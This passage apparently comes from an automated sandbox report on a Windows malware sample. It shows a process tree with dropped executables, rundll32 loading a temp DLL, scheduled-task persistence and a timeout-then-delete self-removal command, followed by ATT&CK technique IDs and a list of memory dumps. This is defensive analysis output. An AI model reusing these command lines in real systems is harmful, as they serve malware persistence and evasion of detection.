        taskkill /im "Sun157a449716c8ee483.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:1628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15d8dfe2c6d17.exe
      4⤵
      Loads dropped DLL
      PID:2016
    - - C:\Users\Admin\AppData\Local\Temp\7zS46697E25\Sun15d8dfe2c6d17.exe
        
        Sun15d8dfe2c6d17.exe
        5⤵
        
        PID:1772

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1492
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:472

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1612
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1032

C:\Users\Admin\AppData\Local\Temp\F74A.exe
C:\Users\Admin\AppData\Local\Temp\F74A.exe
1⤵
PID:2328

C:\Users\Admin\AppData\Local\Temp\542A.exe
C:\Users\Admin\AppData\Local\Temp\542A.exe
1⤵
PID:3032
- C:\Users\Admin\AppData\Local\Temp\542A.exe
  C:\Users\Admin\AppData\Local\Temp\542A.exe
  2⤵
  PID:2184

C:\Windows\system32\taskeng.exe
taskeng.exe {4B439CD7-D2DE-4935-B175-610669DD9E4E} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
PID:304
- C:\Users\Admin\AppData\Roaming\bducebj
  C:\Users\Admin\AppData\Roaming\bducebj
  2⤵
  PID:1932

C:\Users\Admin\AppData\Local\Temp\C4C7.exe
C:\Users\Admin\AppData\Local\Temp\C4C7.exe
1⤵
PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\C4C7.exe"
  2⤵
  PID:2040
- C:\Users\Admin\AppData\Local\Temp\BbvtY8TiUq.exe
  "C:\Users\Admin\AppData\Local\Temp\BbvtY8TiUq.exe"
  2⤵
  PID:1280

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
1⤵
- Delays execution with timeout.exe
PID:2560

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/328-326-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

Filesize
4KB

Download
memory/572-369-0x000000001C340000-0x000000001C342000-memory.dmp

Filesize
8KB

Download
memory/600-288-0x000000001C7C0000-0x000000001C7C2000-memory.dmp

Filesize
8KB

Download
memory/600-194-0x000000013FA80000-0x000000013FA81000-memory.dmp

Filesize
4KB

Download
memory/624-276-0x0000000005C73000-0x0000000005C74000-memory.dmp

Filesize
4KB

Download
memory/624-273-0x0000000005C72000-0x0000000005C73000-memory.dmp

Filesize
4KB

Download
memory/624-251-0x0000000000250000-0x0000000000280000-memory.dmp

Filesize
192KB

Download
memory/624-255-0x0000000000400000-0x000000000179A000-memory.dmp

Filesize
19.6MB

Download
memory/624-271-0x0000000005C71000-0x0000000005C72000-memory.dmp

Filesize
4KB

Download
memory/624-278-0x0000000005C74000-0x0000000005C76000-memory.dmp

Filesize
8KB

Download
memory/700-102-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/700-104-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/700-97-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/700-94-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/700-93-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/700-90-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/700-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/700-109-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/700-88-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/700-106-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/912-356-0x0000000000400000-0x0000000001BB7000-memory.dmp

Filesize
23.7MB

Download
memory/940-196-0x00000000003D0000-0x00000000003D1000-memory.dmp

Filesize
4KB

Download
memory/940-204-0x0000000001EB0000-0x0000000001EB2000-memory.dmp

Filesize
8KB

Download
memory/940-168-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/940-201-0x0000000000400000-0x0000000000401000-memory.dmp

Filesize
4KB

Download
memory/940-199-0x00000000003E0000-0x00000000003FC000-memory.dmp

Filesize
112KB

Download
memory/1104-223-0x00000000001D0000-0x00000000001FF000-memory.dmp

Filesize
188KB

Download
memory/1104-224-0x0000000000400000-0x0000000002B5D000-memory.dmp

Filesize
39.4MB

Download
memory/1212-177-0x0000000002AF0000-0x0000000002B05000-memory.dmp

Filesize
84KB

Download
memory/1232-308-0x00000000049D0000-0x00000000049D1000-memory.dmp

Filesize
4KB

Download
memory/1280-371-0x0000000000220000-0x0000000000224000-memory.dmp

Filesize
16KB

Download
memory/1284-302-0x000000001AC50000-0x000000001AC52000-memory.dmp

Filesize
8KB

Download
memory/1292-176-0x0000000002ED0000-0x0000000002F18000-memory.dmp

Filesize
288KB

Download
memory/1292-174-0x0000000000400000-0x0000000002B6B000-memory.dmp

Filesize
39.4MB

Download
memory/1316-332-0x0000000000ED0000-0x0000000000EE8000-memory.dmp

Filesize
96KB

Download
memory/1400-309-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/1408-200-0x00000000010A0000-0x00000000010A1000-memory.dmp

Filesize
4KB

Download
memory/1408-248-0x0000000000480000-0x0000000000481000-memory.dmp

Filesize
4KB

Download
memory/1408-256-0x000000001AEE0000-0x000000001AEE2000-memory.dmp

Filesize
8KB

Download
memory/1408-242-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/1408-245-0x0000000000460000-0x000000000047A000-memory.dmp

Filesize
104KB

Download
memory/1608-170-0x000000001AFE0000-0x000000001AFE2000-memory.dmp

Filesize
8KB

Download
memory/1608-160-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/1628-173-0x0000000000240000-0x0000000000249000-memory.dmp

Filesize
36KB

Download
memory/1628-175-0x0000000000400000-0x000000000178A000-memory.dmp

Filesize
19.5MB

Download
memory/1772-206-0x00000000008E0000-0x00000000008E1000-memory.dmp

Filesize
4KB

Download
memory/1772-209-0x000000001B040000-0x000000001B042000-memory.dmp

Filesize
8KB

Download
memory/1836-253-0x0000000002140000-0x0000000002D8A000-memory.dmp

Filesize
12.3MB

Download
memory/1888-355-0x0000000000400000-0x00000000017C9000-memory.dmp

Filesize
19.8MB

Download
memory/1888-354-0x0000000000220000-0x00000000002B0000-memory.dmp

Filesize
576KB

Download
memory/1892-217-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1932-367-0x0000000000400000-0x000000000178A000-memory.dmp

Filesize
19.5MB

Download
memory/1972-59-0x0000000076A01000-0x0000000076A03000-memory.dmp

Filesize
8KB

Download
memory/2044-191-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

Filesize
4KB

Download
memory/2088-322-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/2100-360-0x0000000002450000-0x0000000002452000-memory.dmp

Filesize
8KB

Download
memory/2120-236-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/2192-254-0x000000001B2D0000-0x000000001B2D2000-memory.dmp

Filesize
8KB

Download
memory/2192-244-0x0000000000F00000-0x0000000000F01000-memory.dmp

Filesize
4KB

Download
memory/2232-282-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/2232-243-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/2264-333-0x00000000022F0000-0x00000000022F1000-memory.dmp

Filesize
4KB

Download
memory/2280-250-0x0000000001290000-0x0000000001291000-memory.dmp

Filesize
4KB

Download
memory/2280-266-0x000000001ACE0000-0x000000001ACE2000-memory.dmp

Filesize
8KB

Download
memory/2328-343-0x00000000002D0000-0x0000000000300000-memory.dmp

Filesize
192KB

Download
memory/2328-345-0x0000000005CC1000-0x0000000005CC2000-memory.dmp

Filesize
4KB

Download
memory/2328-344-0x0000000000400000-0x000000000179C000-memory.dmp

Filesize
19.6MB

Download
memory/2328-348-0x0000000005CC4000-0x0000000005CC6000-memory.dmp

Filesize
8KB

Download
memory/2328-347-0x0000000005CC3000-0x0000000005CC4000-memory.dmp

Filesize
4KB

Download
memory/2328-346-0x0000000005CC2000-0x0000000005CC3000-memory.dmp

Filesize
4KB

Download
memory/2360-279-0x0000000004800000-0x0000000004801000-memory.dmp

Filesize
4KB

Download
memory/2392-280-0x0000000003BA0000-0x00000000044BE000-memory.dmp

Filesize
9.1MB

Download
memory/2392-281-0x0000000000400000-0x0000000001BB7000-memory.dmp

Filesize
23.7MB

Download
memory/2452-241-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2532-323-0x0000000000A30000-0x0000000000A31000-memory.dmp

Filesize
4KB

Download
memory/2636-339-0x00000000003B0000-0x00000000003B1000-memory.dmp

Filesize
4KB

Download
memory/2680-269-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2788-327-0x0000000000230000-0x00000000002B0000-memory.dmp

Filesize
512KB

Download
memory/2872-338-0x0000000001D20000-0x0000000001D21000-memory.dmp

Filesize
4KB

Download
memory/3032-351-0x0000000003190000-0x00000000032AB000-memory.dmp

Filesize
1.1MB

Download
memory/3056-365-0x0000000140000000-0x0000000140763000-memory.dmp

Filesize
7.4MB

Download
memory/3056-366-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download